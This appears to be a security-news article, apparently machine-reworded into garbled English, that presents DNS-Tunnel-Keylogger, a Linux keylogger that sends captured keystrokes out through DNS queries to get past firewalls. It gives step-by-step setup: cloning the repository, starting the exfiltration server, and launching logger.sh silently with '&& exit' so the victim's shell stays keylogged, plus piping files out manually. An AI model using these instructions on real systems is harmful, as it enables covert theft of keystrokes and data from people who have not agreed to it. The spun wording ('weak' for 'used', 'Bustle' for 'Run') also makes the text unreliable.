DNS Tunnel Keylogger – An Offesnsive Post-Exploitation Tool For Pentesters

A peculiar keylogging server and consumer instrument had been launched on GitHub for pentesters. The instrument utilizes DNS tunneling to transmit keystrokes via firewalls, potentially evading detection covertly.

The instrument, DNS-Tunnel-Keylogger, became designed for post-exploitation activities for pentesters and emphasizes gentle-weight exfiltration and persistence to diminish the potentialities of being chanced on by security systems.

EHA

The server ingredient of the instrument is written in Python 3 and requires the set up of dependencies via pip.

It operates by default on UDP port fifty three, nevertheless users can specify a determined port the use of the -p flag. The server’s IP tackle is weak in SOA and NS records to enable other nameservers to detect the server.

Customers are suggested to living their domain’s namespace to personalized DNS and level it to the exfiltration server’s IP tackle, effectively setting glue records.

DNS tunneling is a technique for encoding the records of alternative applications or protocols in DNS queries and responses.

It can well well presumably be particularly helpful for post-exploitation records extraction while fending off detection and firewall restrictions.

  • Recordsdata of DNS and networking ideas
  • Familiarity with Python and Bash scripting
  • A Linux atmosphere for the keylogger consumer
  • Python3 installed on the server

On the consumer aspect, the Linux keylogger includes two bash scripts. The connection.sh script is accountable for sending the captured keystrokes to the server, while the logger.sh script is weak to open the keylogging course of.

The keylogger also can very wisely be started silently, and the shell also can very wisely be closed upon exit to steer obvious of returning to a non-keylogger assert.

Story

Bustle Free ThreatScan on Your Mailbox

AI-Powered Safety for Business E-mail Safety

Trustifi’s Evolved threat security prevents the widest spectrum of refined assaults sooner than they reach a user’s mailbox. Strive Trustifi Free Threat Scan with Sophisticated AI-Powered E-mail Safety .

The developers show that the keylogger is no longer going to bustle in non-interactive shells and that the Windows Dns_Query_A characteristic tends to send replica requests, though the server is designed to handle this by discarding repeated packets[[

DNS Tunnel Keylogger – Server Setup

Step 1: Clone the Repository

First, you might well clone the DNS-Tunnel-Keylogger repository from GitHub:

git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git

Step 2: Install Dependencies

Navigate to the cloned directory and install the main Python dependencies:

cd DNS-Tunnel-Keylogger python3 -m pip install -r requirements.txt

Step 3: Delivery the Server

To open the server, use the next inform:

python3 main.py  

Replace with the IP tackle of the server and with the domain that the server is authoritative for.

Server Alternate ideas:

  • -h, --help: Cowl the support message and exit.
  • -p PORT, --port PORT: Specify a determined port to hear on. By default, the server listens on UDP port fifty three.

Client Setup (Linux Keylogger)

Step 1: Put collectively the Scripts

Hold sure that that logger.sh and connection.sh are in the the same directory. These scripts will hold and send the keystrokes to the server.

Step 2: Delivery the Keylogger

To open the keylogger, obtain the next inform:

./logger.sh  && exit

Replace with the domain to send records to. The && exit will shut the shell upon exit to prevent returning to a non-keylogged shell.

Keylogger Alternate ideas:

  • -p path: Specify the path to the log file to hear to. By default, that is /tmp/.
  • -l: Bustle the logger with warnings and errors printed, which is able to be helpful for debugging.

Further Recordsdata

Handbook Recordsdata Transmission

Within the event you should send records, equivalent to a file, manually, you also can pipe the records to the connection.sh script, that can establish a connection and send the records.

Safety Issues

If weak without smartly matched authorization, a keylogger and DNS tunneling also can very wisely be notion of malicious and unlawful in many jurisdictions. Hold sure that you just also can use these tools for your atmosphere and follow all linked prison ideas and ethical ideas.

Troubleshooting

  • Within the event you come upon points, remove the &> /dev/null from the keylogger inform to existing error messages.
  • Check the server’s firewall settings to catch sure the DNS port (default fifty three) is delivery for incoming and outgoing connections.
  • Please take a look at that the domain weak is precisely configured and that the server is determined as authoritative for it.

This files offers the steps to living up a DNS tunneling keylogger for covert keystroke exfiltration. Ensure to use this instrument responsibly and internal the regulation.